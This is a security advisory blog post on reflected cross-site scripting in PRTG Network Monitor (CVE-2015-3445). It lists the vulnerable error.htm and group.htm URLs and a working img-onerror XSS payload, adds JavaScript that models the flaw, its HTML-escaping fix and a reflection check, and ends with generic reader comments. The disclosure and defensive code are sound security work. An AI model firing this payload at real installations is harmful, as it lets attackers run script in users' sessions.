PRTG Network Monitor Tool – Cross Site Scripting Vulnerability

Vulnerable Version : 15.1.15.2021
Vendor Patch : 2-June-2015
CVE-ID : CVE-2015-3445
Vendor Notification : 3-June-2015
Vulnerability Type : Cross Site Scripting Vulnerability
Risk Level : Critical
Reported By : Sachin Wagh (@tiger_tigerboy)
Email : wsachin092@gmail.com

PRTG Network Monitor is prone to multiple reflected cross-site scripting vulnerabilities because it writes user-supplied request parameters back into its web pages without sanitizing or encoding them. An attacker who lures an authenticated user into opening a crafted link can execute arbitrary script code in that user's browser in the context of the PRTG web interface.

Vulnerable URLs :

  1. http://127.0.0.1/error.htm?errormsg=
  2. http://127.0.0.1/group.htm?id=2009&tabid=9

XSS Payload :

' "><img src=a onerror=prompt(document.domain);>

[Figure: PRTG Cross Site Scripting, the payload above firing prompt(document.domain) in the browser]

PRTG Network Monitor 15.1.15.2021+ is vulnerable. It is recommended to check the version of your PRTG installation via the Auto Update dialog and apply the vendor patch. For more detail please contact the vendor.
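The reflection mechanism behind the error.htm finding, as an added example that is not PRTG's code or the reporter's: a hypothetical error-page template that writes the errormsg parameter into the page verbatim, the same template with context-aware output encoding, and a check that tells a raw reflection from an encoded one. The template, the CANARY string and all function names are assumptions made for this illustration; the payload and URL are the advisory's own.

```javascript
// Added example, not PRTG's code: a model of the reflected XSS in
// error.htm?errormsg=, its fix (HTML output encoding) and a reflection check.
// The page template below is a hypothetical stand-in for PRTG's error.htm.

// Payload from the advisory, exactly as it would be placed in the URL.
const PAYLOAD = `' "><img src=a onerror=prompt(document.domain);>`;

// Minimal HTML escaper covering text content and double- or single-quoted
// attribute values. Encoding all five characters keeps the input from
// closing an attribute or starting a tag, whichever context it lands in.
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Read the errormsg parameter the way a server would: URL-decoded.
function errormsgFromUrl(url) {
  return new URL(url).searchParams.get('errormsg') ?? '';
}

// Vulnerable: the decoded parameter is interpolated into markup as-is, so
// the browser parses the attacker's <img> tag and runs its onerror handler.
function renderErrorPageVulnerable(errormsg) {
  return `<html><body><p class="error">${errormsg}</p></body></html>`;
}

// Hardened: the same template, but the value is encoded for HTML first.
function renderErrorPageHardened(errormsg) {
  return `<html><body><p class="error">${htmlEscape(errormsg)}</p></body></html>`;
}

// Reflection check: does the response body contain the probe unchanged?
// A canary carrying the HTML-significant characters ' " < > & is enough to
// separate "reflected raw" (exploitable) from "reflected encoded" (safe).
// CANARY is a constructed probe string, not something from the advisory.
const CANARY = `xss'"<>&canary`;
function reflectsUnescaped(body, probe = CANARY) {
  return body.includes(probe);
}

// Drive the advisory's URL through both templates and report the outcome.
function demo() {
  const url = 'http://127.0.0.1/error.htm?errormsg=' + encodeURIComponent(PAYLOAD);
  const msg = errormsgFromUrl(url);           // server-side view of the parameter
  return {
    decodedMatchesPayload: msg === PAYLOAD,
    vulnerable: reflectsUnescaped(renderErrorPageVulnerable(msg), PAYLOAD), // true
    hardened: reflectsUnescaped(renderErrorPageHardened(msg), PAYLOAD),     // false
    hardenedBody: renderErrorPageHardened(msg),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Run with node; demo() shows the decoded payload landing verbatim in the vulnerable page and as `&#x27; &quot;&gt;&lt;img ...` in the hardened one. Against a live target the same check is made by sending the CANARY probe in errormsg and grepping the response body for it raw; a hit means the parameter is still reflected without encoding.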


10 thoughts on “PRTG Network Monitor Tool – Cross Site Scripting Vulnerability”

  1. You really make it appear so easy with your presentation; however, I find this topic to be something which I believe I’d never understand.

    It kind of feels too complicated and extremely broad for
    me. I’m looking forward to your subsequent post; I’ll try to get the hang of it!

  2. Hi! I’m at work browsing your blog from my new iPhone 4!
    Just wanted to say I love reading your blog and look
    forward to all your posts! Keep up the excellent work!

  3. First off I would like to say terrific blog! I had a quick question that I’d like to
    ask if you don’t mind. I was curious to find out
    how you center yourself and clear your mind prior to writing.
    I’ve had a tough time clearing my thoughts in getting my ideas out there.
    I do enjoy writing but it just seems like the first 10 to 15 minutes tend to be wasted simply just trying to figure
    out how to begin. Any ideas or hints? Thanks!

